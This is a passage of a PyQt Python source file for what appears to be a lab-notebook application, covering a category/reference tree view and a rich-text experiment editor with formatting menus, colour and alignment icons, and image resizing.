\"{}\".format(reference.title)\n reference_item = QStandardItem(label)\n reference_item.setData(reference.uuid, Qt.UserRole)\n reference_item.setData(LEVEL_ENTRY, QT_LevelRole)\n reference_item.setForeground(QColor(96, 96, 96))\n category_item.appendRow(reference_item)\n\n self.view_tree.setModel(model)\n self.view_tree.selectionModel().currentChanged.connect(self.selection_change)\n self.list_displayed.emit()\n\n def selection_change(self):\n # Get the category informations\n index = self.view_tree.selectionModel().currentIndex()\n hierarchy_level = self.get_hierarchy_level(index)\n\n if hierarchy_level == 1:\n self.act_update_subcategory.setEnabled(False)\n self.act_delete_subcategory.setEnabled(False)\n self.act_update_category.setEnabled(True)\n self.act_delete_category.setEnabled(True)\n self.act_delete.setEnabled(False)\n self.btn_add.setEnabled(True)\n elif hierarchy_level == 2:\n self.act_update_category.setEnabled(False)\n self.act_delete_category.setEnabled(False)\n self.act_delete.setEnabled(False)\n self.btn_add.setEnabled(True)\n if index.data(QT_LevelRole) == LEVEL_ENTRY:\n self.entry_selected.emit(index.data(Qt.UserRole))\n self.act_delete.setEnabled(True)\n else:\n self.act_update_subcategory.setEnabled(True)\n self.act_delete_subcategory.setEnabled(True)\n elif hierarchy_level == 3:\n self.act_update_subcategory.setEnabled(False)\n self.act_delete_subcategory.setEnabled(False)\n self.act_update_category.setEnabled(False)\n self.act_delete_category.setEnabled(False)\n self.act_delete.setEnabled(True)\n self.btn_add.setEnabled(True)\n self.entry_selected.emit(index.data(Qt.UserRole))\n\n def get_subcategory(self, index):\n \"\"\" Return the current subcategory id\n\n :return int: Subcategory id\n \"\"\"\n\n hierarchy_level = self.get_hierarchy_level(index)\n\n if hierarchy_level == 2:\n return index.data(Qt.UserRole)\n elif hierarchy_level == 3:\n return index.parent().data(Qt.UserRole)\n else:\n return None\n\n def is_category(self, index):\n \"\"\" Return true if the index is a category\n\n :param index: Item index\n :type index: 
QModelIndex\n :return bool: True if the index is a category\n \"\"\"\n if index.data(QT_LevelRole) == LEVEL_CATEGORY:\n return True\n return False\n\n def is_subcategory(self, index):\n \"\"\" Return true if the index is a subcategory\n\n :param index: Item index\n :type index: QModelIndex\n :return bool: True if the index is a subcategory\n \"\"\"\n if index.data(QT_LevelRole) == LEVEL_SUBCATEGORY:\n return True\n return False\n\n def is_entry(self, index):\n \"\"\" Return true if the index is a reference\n\n :param index: Item index\n :type index: QModelIndex\n :return bool: True if the index is a reference\n \"\"\"\n if index.data(QT_LevelRole) == LEVEL_ENTRY:\n return True\n return False\n\n def get_hierarchy_level(self, index):\n \"\"\" Get the hierarchy level for the index\n\n :param index: Item index\n :type index: QModelIndex\n :return int: Hierarchy level\n \"\"\"\n hierarchy_level = 1\n seek_root = index\n\n while seek_root.parent() != QModelIndex():\n seek_root = seek_root.parent()\n hierarchy_level = hierarchy_level + 1\n\n return hierarchy_level\n\n def get_category(self, index):\n \"\"\" Return the current category id\n\n :return int: Category id\n \"\"\"\n\n hierarchy_level = self.get_hierarchy_level(index)\n\n if hierarchy_level == 1:\n return index.data(Qt.UserRole)\n elif hierarchy_level == 2:\n return index.parent().data(Qt.UserRole)\n elif hierarchy_level == 3:\n parent = index.parent()\n return parent.parent().data(Qt.UserRole)\n else:\n return None\n\n def get_user_data(self):\n \"\"\" Return the data in the current item for user role \"\"\"\n index = self.view_tree.selectionModel().currentIndex()\n return index.data(Qt.UserRole)\n\n def get_current_level(self):\n \"\"\" Return the level of the current item \"\"\"\n index = self.view_tree.selectionModel().currentIndex()\n return index.data(QT_LevelRole)\n\n def prepare_category_data_string(self, id):\n \"\"\" Add a 'C' before the category data string\n\n This is required to save the treeview state as the category and subcategory id are identical\n\n :param id: Category id\n :type id: int\n :return str: C + id\n \"\"\"\n return \"C{}\".format(id)\n\n def prepare_subcategory_data_string(self, id):\n \"\"\" Add an 'S' before the subcategory data string\n\n This is required to save the treeview state as the category and subcategory id are identical\n\n :param id: Subcategory id\n :type id: int\n :return str: S + id\n \"\"\"\n return \"S{}\".format(id)\n\n\nclass TextEditor(QWidget, Ui_TextEditor):\n \"\"\" Complex text editor \"\"\"\n\n # Class variable definition\n width_height_ratio = 1\n\n def __init__(self, editor_type, tag_list=None, reference_list=None, dataset_list=None, protocol_list=None):\n super(TextEditor, self).__init__()\n # Set class variable\n self.tag_list = tag_list\n self.reference_list = reference_list\n self.dataset_list = dataset_list\n self.protocol_list = protocol_list\n self.editor_type = editor_type\n\n self.setupUi(self)\n self.init_ui()\n self.init_connection()\n\n def init_ui(self):\n # Insert title text edit\n self.txt_title = QPlainTextEdit()\n font = QFont()\n font.setBold(True)\n font.setPointSize(16)\n self.txt_title.setFont(font)\n self.txt_title.setPlaceholderText(\"Untitled experiment\")\n self.txt_title.setFixedHeight(48)\n self.title_layout.insertWidget(0, self.txt_title)\n self.title_layout.setStretch(0, 10)\n\n # Insert key text edit\n self.txt_key = LineEdit()\n self.txt_key.setPlaceholderText(\"Experiment key\")\n self.txt_key.setStyleSheet(\" QLineEdit { border: none; 
padding-left: 2px; } \")\n self.txt_key.setVisible(False)\n self.layout().insertWidget(2, self.txt_key)\n\n # Insert descrition text edit\n self.txt_description = CompleterTextEdit(tag_list=self.tag_list)\n self.txt_description.setPlaceholderText(\"Objectives of the experiment\")\n self.txt_description.setFixedHeight(74)\n self.layout().insertWidget(3, self.txt_description)\n\n # Insert textedit in layout\n self.txt_body = ImageTextEdit(editor_type=self.editor_type, reference_list=self.reference_list,\n dataset_list=self.dataset_list, protocol_list=self.protocol_list)\n self.txt_body.setStyleSheet(\"border-top: 0.5px solid rgb(212, 212, 212)\")\n self.layout().insertWidget(4, self.txt_body, 10)\n\n # Set button groups\n self.btn_bold.setProperty(\"Menu\", False)\n self.btn_italic.setProperty(\"Menu\", False)\n self.btn_underline.setProperty(\"Menu\", False)\n self.btn_strikethrough.setProperty(\"Menu\", False)\n self.btn_superscript.setProperty(\"Menu\", False)\n self.btn_subscript.setProperty(\"Menu\", False)\n self.btn_center.setProperty(\"Menu\", False)\n self.btn_left.setProperty(\"Menu\", False)\n self.btn_right.setProperty(\"Menu\", False)\n self.btn_justify.setProperty(\"Menu\", False)\n self.btn_style.setProperty(\"Menu\", True)\n self.btn_color.setProperty(\"Menu\", True)\n self.btn_highlight.setProperty(\"Menu\", True)\n self.btn_list.setProperty(\"Menu\", True)\n self.btn_color.setProperty(\"IconOnly\", True)\n self.btn_highlight.setProperty(\"IconOnly\", True)\n\n # Image size line edit\n validator = QRegExpValidator(QRegExp(\"^[0-9]{0,4}$\"))\n self.txt_width.setValidator(validator)\n self.txt_height.setValidator(validator)\n\n # Style menu\n self.act_part = QAction(\"Part\", self)\n self.act_part.setFont(QFont(self.font().family(), 20, 75))\n self.act_section = QAction(\"Section\", self)\n self.act_section.setFont(QFont(self.font().family(), 16, 75))\n self.act_subsection = QAction(\"Subsection\", self)\n self.act_subsection.setFont(QFont(self.font().family(), 14, 75))\n self.act_subsubsection = QAction(\"Subsubsection\", self)\n self.act_subsubsection.setFont(QFont(self.font().family(), 12, 75))\n self.act_body = QAction(\"Body\", self)\n self.act_body.setFont(QFont(self.font().family(), 12, 50))\n self.act_note = QAction(\"Note\", self)\n self.act_note.setFont(QFont(self.font().family(), 11, 50))\n\n self.style_menu = QMenu(self)\n self.style_menu.addAction(self.act_part)\n self.style_menu.addAction(self.act_section)\n self.style_menu.addAction(self.act_subsection)\n self.style_menu.addAction(self.act_subsubsection)\n self.style_menu.addAction(self.act_body)\n self.style_menu.addAction(self.act_note)\n self.btn_style.setMenu(self.style_menu)\n\n # Highlight color menu\n self.act_clear_highlight = QAction(\"Clear\", self)\n clear_highlight_icon = self.draw_color(Qt.white, Qt.lightGray)\n self.act_clear_highlight.setIcon(clear_highlight_icon)\n\n self.act_red_highlight = QAction(\"Red\", self)\n red_highlight_icon = self.draw_color(\n common.HIGHLIGHT_COLOR['red'].color, common.HIGHLIGHT_COLOR['red'].dark_shade)\n self.act_red_highlight.setIcon(red_highlight_icon)\n\n self.act_orange_highlight = QAction(\"Orange\", self)\n orange_highlight_icon = self.draw_color(\n common.HIGHLIGHT_COLOR['orange'].color, common.HIGHLIGHT_COLOR['orange'].dark_shade)\n self.act_orange_highlight.setIcon(orange_highlight_icon)\n\n self.act_yellow_highlight = QAction(\"Yellow\", self)\n yellow_highlight_icon = self.draw_color(\n common.HIGHLIGHT_COLOR['yellow'].color, 
common.HIGHLIGHT_COLOR['yellow'].dark_shade)\n self.act_yellow_highlight.setIcon(yellow_highlight_icon)\n\n self.act_green_highlight = QAction(\"Green\", self)\n green_highlight_icon = self.draw_color(\n common.HIGHLIGHT_COLOR['green'].color, common.HIGHLIGHT_COLOR['green'].dark_shade)\n self.act_green_highlight.setIcon(green_highlight_icon)\n\n self.act_blue_highlight = QAction(\"Blue\", self)\n blue_highlight_icon = self.draw_color(\n common.HIGHLIGHT_COLOR['blue'].color, common.HIGHLIGHT_COLOR['blue'].dark_shade)\n self.act_blue_highlight.setIcon(blue_highlight_icon)\n\n self.act_purple_highlight = QAction(\"Purple\", self)\n purple_highlight_icon = self.draw_color(\n common.HIGHLIGHT_COLOR['purple'].color, common.HIGHLIGHT_COLOR['purple'].dark_shade)\n self.act_purple_highlight.setIcon(purple_highlight_icon)\n\n self.act_gray_highlight = QAction(\"Gray\", self)\n gray_highlight_icon = self.draw_color(\n common.HIGHLIGHT_COLOR['gray'].color, common.HIGHLIGHT_COLOR['gray'].dark_shade)\n self.act_gray_highlight.setIcon(gray_highlight_icon)\n\n self.highlight_menu = QMenu(self)\n self.highlight_menu.addAction(self.act_clear_highlight)\n self.highlight_menu.addAction(self.act_red_highlight)\n self.highlight_menu.addAction(self.act_orange_highlight)\n self.highlight_menu.addAction(self.act_yellow_highlight)\n self.highlight_menu.addAction(self.act_green_highlight)\n self.highlight_menu.addAction(self.act_blue_highlight)\n self.highlight_menu.addAction(self.act_purple_highlight)\n self.highlight_menu.addAction(self.act_gray_highlight)\n self.btn_highlight.setMenu(self.highlight_menu)\n\n # Text color menu\n self.act_black_text = QAction(\"Black\", self)\n black_text_icon = self.draw_color(common.TEXT_COLOR['black'].color, common.TEXT_COLOR['black'].dark_shade)\n self.act_black_text.setIcon(black_text_icon)\n\n self.act_gray_text = QAction(\"Gray\", self)\n gray_text_icon = self.draw_color(common.TEXT_COLOR['gray'].color, common.TEXT_COLOR['gray'].dark_shade)\n self.act_gray_text.setIcon(gray_text_icon)\n\n self.act_red_text = QAction(\"Red\", self)\n red_text_icon = self.draw_color(common.TEXT_COLOR['red'].color, common.TEXT_COLOR['red'].dark_shade)\n self.act_red_text.setIcon(red_text_icon)\n\n self.act_orange_text = QAction(\"Orange\", self)\n orange_text_icon = self.draw_color(common.TEXT_COLOR['orange'].color, common.TEXT_COLOR['orange'].dark_shade)\n self.act_orange_text.setIcon(orange_text_icon)\n\n self.act_yellow_text = QAction(\"Yellow\", self)\n yellow_text_icon = self.draw_color(common.TEXT_COLOR['yellow'].color, common.TEXT_COLOR['yellow'].dark_shade)\n self.act_yellow_text.setIcon(yellow_text_icon)\n\n self.act_green_text = QAction(\"Green\", self)\n green_text_icon = self.draw_color(common.TEXT_COLOR['green'].color, common.TEXT_COLOR['green'].dark_shade)\n self.act_green_text.setIcon(green_text_icon)\n\n self.act_blue_text = QAction(\"Blue\", self)\n blue_text_icon = self.draw_color(common.TEXT_COLOR['blue'].color, common.TEXT_COLOR['blue'].dark_shade)\n self.act_blue_text.setIcon(blue_text_icon)\n\n self.act_purple_text = QAction(\"Purple\", self)\n purple_text_icon = self.draw_color(common.TEXT_COLOR['purple'].color, common.TEXT_COLOR['purple'].dark_shade)\n self.act_purple_text.setIcon(purple_text_icon)\n\n self.color_menu = QMenu(self)\n self.color_menu.addAction(self.act_black_text)\n self.color_menu.addAction(self.act_gray_text)\n self.color_menu.addAction(self.act_red_text)\n self.color_menu.addAction(self.act_orange_text)\n 
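# Standalone sketch of the menu-button pattern used for the style, colour and
# highlight buttons above: a QToolButton whose QMenu of QActions reports picks
# through the menu's triggered signal.  PyQt5 is assumed here purely for
# illustration; the original widget may target a different Qt binding.
from PyQt5.QtWidgets import QApplication, QToolButton, QMenu, QAction

def build_picker_button(names):
    button = QToolButton()
    menu = QMenu(button)
    for name in names:
        menu.addAction(QAction(name, menu))            # one entry per choice
    menu.triggered.connect(lambda act: print("picked", act.text()))
    button.setMenu(menu)
    button.setPopupMode(QToolButton.InstantPopup)      # open the menu on click
    return button

if __name__ == '__main__':
    app = QApplication([])
    btn = build_picker_button(["Black", "Red", "Blue"])
    btn.show()
    app.exec_()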
self.color_menu.addAction(self.act_yellow_text)\n self.color_menu.addAction(self.act_green_text)\n self.color_menu.addAction(self.act_blue_text)\n self.color_menu.addAction(self.act_purple_text)\n self.btn_color.setMenu(self.color_menu)\n\n # List menu\n self.act_no_list = QAction(\"No list\", self)\n self.act_bullet_list = QAction(\"• Bullet\", self)\n self.act_numbered_list = QAction(\"1. Numbered\", self)\n self.act_roman_list = QAction(\"I. Roman numbered\", self)\n self.act_uppercase_list = QAction(\"A. Uppercase letters\", self)\n self.act_lowercase_list = QAction(\"a. Lowercase letters\", self)\n self.act_increase_indent = QAction(\"Increase indentation\")\n self.act_decrease_indent = QAction(\"Decrease indentation\")\n\n self.list_menu = QMenu(self)\n self.list_menu.addAction(self.act_no_list)\n self.list_menu.addAction(self.act_bullet_list)\n self.list_menu.addAction(self.act_numbered_list)\n self.list_menu.addAction(self.act_roman_list)\n self.list_menu.addAction(self.act_uppercase_list)\n self.list_menu.addAction(self.act_lowercase_list)\n self.list_menu.addSeparator()\n self.list_menu.addAction(self.act_increase_indent)\n self.list_menu.addAction(self.act_decrease_indent)\n\n self.btn_list.setMenu(self.list_menu)\n\n # Align button\n self.btn_left.setIcon(self.draw_left())\n self.btn_center.setIcon(self.draw_center())\n self.btn_right.setIcon(self.draw_right())\n self.btn_justify.setIcon(self.draw_justify())\n\n # Set style sheet\n stylesheet.set_style_sheet(self, \":/StyleSheet/Widget/style-sheet/widget/widget/text_editor.qss\")\n stylesheet.set_style_sheet(self.icon_frame,\n \":/StyleSheet/Widget/style-sheet/widget/widget/text_editor_button_frame.qss\")\n\n # Superscript button text\n text = QTextDocument()\n text.setHtml(\"

X<sup>2</sup>
\")\n\n pixmap = self.draw_text(text)\n icon = QIcon(pixmap)\n self.btn_superscript.setIcon(icon)\n self.btn_superscript.setIconSize(pixmap.rect().size() / self.devicePixelRatioF())\n\n # Subscript button text\n text = QTextDocument()\n text.setHtml(\"

X<sub>2</sub>
\")\n\n pixmap = self.draw_text(text)\n icon = QIcon(pixmap)\n self.btn_subscript.setIcon(icon)\n self.btn_subscript.setIconSize(pixmap.rect().size() / self.devicePixelRatioF())\n\n # Default color icons\n self.change_highlight_button_icon(self.act_clear_highlight)\n self.change_text_color_button_icon(self.act_black_text)\n self.change_list_button_icon(self.act_no_list)\n\n # Set visible components and event filter\n self.icon_frame.setVisible(False)\n self.txt_title.installEventFilter(self)\n self.txt_body.installEventFilter(self)\n self.txt_description.setVisible(False)\n\n def init_connection(self):\n self.btn_bold.clicked.connect(self.format_bold)\n self.btn_italic.clicked.connect(self.format_italic)\n self.btn_underline.clicked.connect(self.format_underline)\n self.btn_strikethrough.clicked.connect(self.format_strikethrough)\n self.btn_superscript.clicked.connect(self.format_superscript)\n self.btn_subscript.clicked.connect(self.format_subscript)\n self.highlight_menu.triggered.connect(self.change_highlight_button_icon)\n self.color_menu.triggered.connect(self.change_text_color_button_icon)\n self.list_menu.triggered.connect(self.change_list_button_icon)\n self.list_menu.triggered.connect(self.format_list)\n self.color_menu.triggered.connect(self.format_text_color)\n self.highlight_menu.triggered.connect(self.format_highlight)\n self.style_menu.triggered.connect(self.format_style)\n self.txt_body.cursorPositionChanged.connect(self.update_button)\n self.txt_width.textEdited.connect(self.update_height)\n self.txt_height.textEdited.connect(self.update_width)\n self.txt_width.editingFinished.connect(self.update_image_size)\n self.btn_left.clicked.connect(self.format_align_left)\n self.btn_right.clicked.connect(self.format_align_right)\n self.btn_center.clicked.connect(self.format_align_center)\n self.btn_justify.clicked.connect(self.format_align_justify)\n\n def update_height(self):\n \"\"\" Update height value when the width is changed \"\"\"\n if self.txt_width.text():\n self.txt_height.setText(\"{:.0f}\".format(int(self.txt_width.text()) * 1/self.width_height_ratio))\n else:\n self.txt_height.setText(\"0\")\n\n def update_width(self):\n \"\"\" Update width value when the height is changed \"\"\"\n if self.txt_height.text():\n self.txt_width.setText(\"{:.0f}\".format(int(self.txt_height.text()) * self.width_height_ratio))\n else:\n self.txt_width.setText(\"0\")\n\n def update_image_size(self):\n cursor = self.txt_body.textCursor()\n\n if not cursor.hasSelection():\n cursor.setPosition(self.txt_body.textCursor().position() - 1)\n cursor.setPosition(self.txt_body.textCursor().position(), QTextCursor.KeepAnchor)\n\n fmt = cursor.charFormat().toImageFormat()\n fmt.setWidth(int(self.txt_width.text()))\n fmt.setHeight(int(self.txt_height.text()))\n cursor.setCharFormat(fmt)\n self.txt_body.setTextCursor(cursor)\n\n def eventFilter(self, object, event):\n if event.type() == QEvent.FocusIn:\n if object == self.txt_title:\n self.edit_title()\n if object == self.txt_body:\n self.edit_body()\n return QWidget.eventFilter(self, object, event)\n\n def edit_title(self):\n \"\"\" Show the interface element required to edit title \"\"\"\n self.icon_frame.setVisible(False)\n self.txt_description.setVisible(True)\n self.txt_key.setVisible(True)\n\n def edit_body(self):\n \"\"\" Show the interface element required to edit the body \"\"\"\n self.icon_frame.setVisible(True)\n self.txt_description.setVisible(False)\n self.txt_key.setVisible(False)\n\n def change_list_button_icon(self, action):\n \"\"\"Change 
the list button icon to the selected list format\n\n :param action: Selected action.\n :type action: QAction\n \"\"\"\n\n # Ignore the indent change action when changing the icon type\n if not (action == self.act_increase_indent or action == self.act_decrease_indent):\n if action == self.act_bullet_list:\n icon = self.draw_list([\"•\", \"•\", \"•\"])\n elif action == self.act_numbered_list:\n icon = self.draw_list([\"1.\", \"2.\", \"3.\"])\n elif action == self.act_roman_list:\n icon = self.draw_list([\"I.\", \"II.\", \"III.\"])\n elif action == self.act_uppercase_list:\n icon = self.draw_list([\"A.\", \"B.\", \"C.\"])\n else:\n icon = self.draw_list([\"a.\", \"b.\", \"c.\"])\n self.btn_list.setIcon(icon)\n\n # Do no check the button is no list is selected\n if not (action == self.act_no_list):\n self.btn_list.setChecked(True)\n elif action == self.act_no_list:\n self.btn_list.setChecked(False)\n\n def draw_list(self, separator_list):\n \"\"\"Draw the list icons for the icon menu\n\n .. note::\n This function handle HiDPI as well a regular screen\n\n :param separator_list: List of the bullets\n :type separator_list: List[str]\n :returns: QPixmap -- Icon pixmap\n \"\"\"\n # Create a base pixmap\n # Set the pixmap pixel ratio so that the image looks good in normal as well as HiDPI screens\n dpr = self.devicePixelRatioF()\n pixmap = QPixmap(16 * dpr, 16 * dpr)\n pixmap.setDevicePixelRatio(dpr)\n pixmap.fill(Qt.transparent) # Required to create a transparent background\n\n # Paint the elements of the icon\n painter = QPainter(pixmap)\n painter.setFont(QFont(self.font().family(), 5, 50))\n pen = QPen(QColor(72, 72, 72), 1)\n painter.setPen(pen)\n painter.drawLine(7, 3, 15, 3)\n painter.drawText(0, 0, 32, 22, Qt.AlignLeft, separator_list[0])\n painter.drawLine(7, 8, 15, 8)\n painter.drawText(0, 5, 32, 22, Qt.AlignLeft, separator_list[1])\n painter.drawLine(7, 13, 15, 13)\n painter.drawText(0, 10, 32, 22, Qt.AlignLeft, separator_list[2])\n painter.end()\n\n return QIcon(pixmap)\n\n def draw_left(self):\n \"\"\" Draw the icon for the align left button \"\"\"\n dpr = self.devicePixelRatioF()\n pixmap = QPixmap(16 * dpr, 16 * dpr)\n pixmap.setDevicePixelRatio(dpr)\n pixmap.fill(Qt.transparent) # Required to create a transparent background\n\n # Paint the elements of the icon\n painter = QPainter(pixmap)\n pen = QPen(QColor(72, 72, 72), 1)\n painter.setPen(pen)\n painter.drawLine(2, 3, 15, 3)\n painter.drawLine(2, 6, 11, 6)\n painter.drawLine(2, 9, 15, 9)\n painter.drawLine(2, 12, 13, 12)\n painter.end()\n\n return QIcon(pixmap)\n\n def draw_center(self):\n \"\"\" Draw the icon for the align left button \"\"\"\n dpr = self.devicePixelRatioF()\n pixmap = QPixmap(16 * dpr, 16 * dpr)\n pixmap.setDevicePixelRatio(dpr)\n pixmap.fill(Qt.transparent) # Required to create a transparent background\n\n # Paint the elements of the icon\n painter = QPainter(pixmap)\n pen = QPen(QColor(72, 72, 72), 1)\n painter.setPen(pen)\n painter.drawLine(2, 3, 15, 3)\n painter.drawLine(5, 6, 11, 6)\n painter.drawLine(2, 9, 15, 9)\n painter.drawLine(4, 12, 13, 12)\n painter.end()\n\n return QIcon(pixmap)\n\n def draw_right(self):\n \"\"\" Draw the icon for the align left button \"\"\"\n dpr = self.devicePixelRatioF()\n pixmap = QPixmap(16 * dpr, 16 * dpr)\n pixmap.setDevicePixelRatio(dpr)\n pixmap.fill(Qt.transparent) # Required to create a transparent background\n\n # Paint the elements of the icon\n painter = QPainter(pixmap)\n pen = QPen(QColor(72, 72, 72), 1)\n painter.setPen(pen)\n painter.drawLine(3, 3, 15, 3)\n 
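# Standalone sketch of the HiDPI-aware icon drawing used by the draw_* helpers
# above: allocate the pixmap at devicePixelRatio times the logical size, tag it
# with that ratio, then paint in logical coordinates.  PyQt5 is assumed here
# for illustration only.
from PyQt5.QtCore import Qt
from PyQt5.QtGui import QColor, QIcon, QPainter, QPen, QPixmap
from PyQt5.QtWidgets import QApplication, QWidget

def make_line_icon(widget, size=16):
    dpr = widget.devicePixelRatioF()
    pixmap = QPixmap(int(size * dpr), int(size * dpr))
    pixmap.setDevicePixelRatio(dpr)
    pixmap.fill(Qt.transparent)                  # transparent background
    painter = QPainter(pixmap)
    painter.setPen(QPen(QColor(72, 72, 72), 1))
    for y in (3, 6, 9, 12):                      # four horizontal strokes
        painter.drawLine(2, y, size - 2, y)
    painter.end()
    return QIcon(pixmap)

if __name__ == '__main__':
    app = QApplication([])
    icon = make_line_icon(QWidget())
    print("icon created:", not icon.isNull())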
painter.drawLine(6, 6, 15, 6)\n painter.drawLine(2, 9, 15, 9)\n painter.drawLine(4, 12, 15, 12)\n painter.end()\n\n return QIcon(pixmap)\n\n def draw_justify(self):\n \"\"\" Draw the icon for the align left button \"\"\"\n dpr = self.devicePixelRatioF()\n pixmap = QPixmap(16 * dpr, 16 * dpr)\n pixmap.setDevicePixelRatio(dpr)\n pixmap.fill(Qt.transparent) # Required to create a transparent background\n\n # Paint the elements of the icon\n painter = QPainter(pixmap)\n pen = QPen(QColor(72, 72, 72), 1)\n painter.setPen(pen)\n painter.drawLine(2, 3, 15, 3)\n painter.drawLine(2, 6, 15, 6)\n painter.drawLine(2, 9, 15, 9)\n painter.drawLine(2, 12, 15, 12)\n painter.end()\n\n return QIcon(pixmap)\n\n def change_text_color_button_icon(self, action):\n \"\"\"Change the text color button icon to the selected color\n\n :param action: Selected action.\n :type action: QAction\n \"\"\"\n if action == self.act_gray_text:\n icon = self.draw_color(common.TEXT_COLOR['gray'].color, common.TEXT_COLOR['gray'].dark_shade)\n elif action == self.act_red_text:\n icon = self.draw_color(common.TEXT_COLOR['red'].color, common.TEXT_COLOR['red'].dark_shade)\n elif action == self.act_orange_text:\n icon = self.draw_color(common.TEXT_COLOR['orange'].color, common.TEXT_COLOR['orange'].dark_shade)\n elif action == self.act_yellow_text:\n icon = self.draw_color(common.TEXT_COLOR['yellow'].color, common.TEXT_COLOR['yellow'].dark_shade)\n elif action == self.act_green_text:\n icon = self.draw_color(common.TEXT_COLOR['green'].color, common.TEXT_COLOR['green'].dark_shade)\n elif action == self.act_blue_text:\n icon = self.draw_color(common.TEXT_COLOR['blue'].color, common.TEXT_COLOR['blue'].dark_shade)\n elif action == self.act_purple_text:\n icon = self.draw_color(common.TEXT_COLOR['purple'].color, common.TEXT_COLOR['purple'].dark_shade)\n else:\n icon = self.draw_color(common.TEXT_COLOR['black'].color, common.TEXT_COLOR['black'].dark_shade)\n self.btn_color.setIcon(icon)\n\n def change_highlight_button_icon(self, action):\n \"\"\"Change the highlight button icon to the selected color\n\n :param action: Selected action.\n :type action: QAction\n \"\"\"\n if action == self.act_red_highlight:\n icon = self.draw_color(common.HIGHLIGHT_COLOR['red'].color, common.HIGHLIGHT_COLOR['red'].dark_shade)\n elif action == self.act_orange_highlight:\n icon = self.draw_color(common.HIGHLIGHT_COLOR['orange'].color, common.HIGHLIGHT_COLOR['orange'].dark_shade)\n elif action == self.act_yellow_highlight:\n icon = self.draw_color(common.HIGHLIGHT_COLOR['yellow'].color, common.HIGHLIGHT_COLOR['yellow'].dark_shade)\n elif action == self.act_green_highlight:\n icon = self.draw_color(common.HIGHLIGHT_COLOR['green'].color, common.HIGHLIGHT_COLOR['green'].dark_shade)\n elif action == self.act_blue_highlight:\n icon = self.draw_color(common.HIGHLIGHT_COLOR['blue'].color, common.HIGHLIGHT_COLOR['blue'].dark_shade)\n elif action == self.act_purple_highlight:\n icon = self.draw_color(common.HIGHLIGHT_COLOR['purple'].color, common.HIGHLIGHT_COLOR['purple'].dark_shade)\n elif action == self.act_gray_highlight:\n icon = self.draw_color(common.HIGHLIGHT_COLOR['gray'].color, common.HIGHLIGHT_COLOR['gray'].dark_shade)\n else:\n icon = self.draw_color(common.HIGHLIGHT_COLOR['clear'].color, common.HIGHLIGHT_COLOR['clear'].dark_shade)\n self.btn_highlight.setIcon(icon)\n\n def draw_color(self, fill, border):\n \"\"\"Draw the color icons for the highlight and the text color menu\n\n :param fill: Fill color.\n :type fill: QColor\n :param border: Border color.\n :type 
border: QColor\n :returns: QPixmap -- Icon pixmap\n \"\"\"\n # Create a base pixmap\n # Set the pixmap pixel ratio so that the image looks good in normal as well as HiDPI screens\n dpr = self.devicePixelRatioF()\n pixmap = QPixmap(16 * dpr, 16 * dpr)\n pixmap.setDevicePixelRatio(dpr)\n pixmap.fill(Qt.transparent)\n\n # Paint the elements of the icon\n painter = QPainter(pixmap)\n painter.setRenderHint(QPainter.Antialiasing)\n path = QPainterPath()\n path.addRoundedRect(QRectF(2, 2, 12, 12), 2, 2)\n\n pen = QPen(border, 1)\n painter.setPen(pen)\n painter.fillPath(path, fill)\n painter.drawPath(path)\n painter.end()\n\n return QIcon(pixmap)\n\n def draw_text(self, text):\n \"\"\"Draw an icon from a html text and return it as a pixmap.\n\n .. note::\n This function handle HiDPI as well a regular screen.\n\n :param text: QTextDocument with HTML code for the icon.\n :type text: QTextDocument\n :returns: QPixmap -- Returns pixmap that can be used to create the icon\n\n .. note::\n Unlike the other drawing function, this function return a pixel map. As of now, this is required to create\n a good sized icon. This should therefore not be changed unless the the output icon size is right (it is\n currently too small).\n \"\"\"\n # Create a base pixmap\n # Set the pixmap pixel ratio so that the image looks good in normal as well as HiDPI screens\n dpr = self.devicePixelRatioF()\n pixmap = QPixmap(text.size().width() * dpr, text.size().height() * dpr)\n pixmap.setDevicePixelRatio(dpr)\n pixmap.fill(Qt.transparent)\n\n # Paint the elements of the icon\n painter = QPainter(pixmap)\n text.drawContents(painter, QRectF(pixmap.rect()))\n painter.end()\n\n return pixmap\n\n def merge_format_on_word_or_selection(self, fmt):\n \"\"\" Change the caracter format when a format button is pressed.\n\n The font is changed for the selection or from the cursor position.\n :param fmt: Text format\n \"\"\"\n cursor = self.txt_body.textCursor()\n cursor.mergeCharFormat(fmt)\n self.txt_body.mergeCurrentCharFormat(fmt)\n\n def format_bold(self):\n \"\"\" Set text format to bold. \"\"\"\n fmt = QTextCharFormat()\n if self.btn_bold.isChecked():\n fmt.setFontWeight(QFont.Bold)\n else:\n fmt.setFontWeight(QFont.Normal)\n self.merge_format_on_word_or_selection(fmt=fmt)\n\n def format_italic(self):\n \"\"\" Set text format to italic. \"\"\"\n fmt = QTextCharFormat()\n if self.btn_italic.isChecked():\n fmt.setFontItalic(True)\n else:\n fmt.setFontItalic(False)\n self.merge_format_on_word_or_selection(fmt=fmt)\n\n def format_underline(self):\n \"\"\" Set text format to underline. \"\"\"\n fmt = QTextCharFormat()\n if self.btn_underline.isChecked():\n fmt.setFontUnderline(True)\n else:\n fmt.setFontUnderline(False)\n self.merge_format_on_word_or_selection(fmt=fmt)\n\n def format_strikethrough(self):\n \"\"\" Set text format to strikethrough. \"\"\"\n fmt = QTextCharFormat()\n if self.btn_strikethrough.isChecked():\n fmt.setFontStrikeOut(True)\n else:\n fmt.setFontStrikeOut(False)\n self.merge_format_on_word_or_selection(fmt=fmt)\n\n def format_superscript(self):\n \"\"\" Set text vertical alignment to superscript. \"\"\"\n fmt = QTextCharFormat()\n if self.btn_superscript.isChecked():\n fmt.setVerticalAlignment(QTextCharFormat.AlignSuperScript)\n else:\n fmt.setVerticalAlignment(QTextCharFormat.AlignNormal)\n self.merge_format_on_word_or_selection(fmt=fmt)\n\n def format_subscript(self):\n \"\"\" Set text vertical alignment to subscript. 
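# Standalone sketch of the character-format toggling shown above: build a
# QTextCharFormat and merge it over both the cursor selection and the editor's
# current format, so selected text and newly typed text pick it up.  PyQt5 is
# assumed here for illustration only.
from PyQt5.QtGui import QFont, QTextCharFormat
from PyQt5.QtWidgets import QApplication, QTextEdit

def toggle_bold(text_edit, enabled):
    fmt = QTextCharFormat()
    fmt.setFontWeight(QFont.Bold if enabled else QFont.Normal)
    cursor = text_edit.textCursor()
    cursor.mergeCharFormat(fmt)             # affects the selected text
    text_edit.mergeCurrentCharFormat(fmt)   # affects text typed afterwards

if __name__ == '__main__':
    app = QApplication([])
    edit = QTextEdit("some text")
    edit.selectAll()
    toggle_bold(edit, True)
    print("font-weight" in edit.toHtml())   # True once the bold format is merged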
